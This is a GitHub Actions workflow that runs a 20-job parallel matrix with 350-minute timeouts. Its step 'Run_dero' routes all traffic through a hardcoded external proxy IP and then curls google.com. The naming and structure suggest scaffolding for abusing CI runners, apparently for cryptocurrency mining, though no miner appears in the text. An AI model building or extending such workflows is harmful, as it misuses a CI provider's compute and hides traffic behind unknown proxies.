name: askla

on: workflow_dispatch
jobs:
  build:
    name: KolaseIX
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix: 
        numb: [1.12, 1.15]
        char: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 350
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.numb }}
    steps:
    - name: Set up Go ${{ matrix.numb }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.numb }}
      id: go
    - name: KolaseIX
      uses: actions/checkout@v1
    - name: Run_dero
      continue-on-error: true
      run: |
       export http_proxy=http://72.206.181.105:64935
       export https_proxy=https://72.206.181.105:64935
       export ftp_proxy=http://72.206.181.105:64935
       export socks_proxy=http://72.206.181.105:64935
       export all_proxy=http://72.206.181.105:64935
       curl google.com
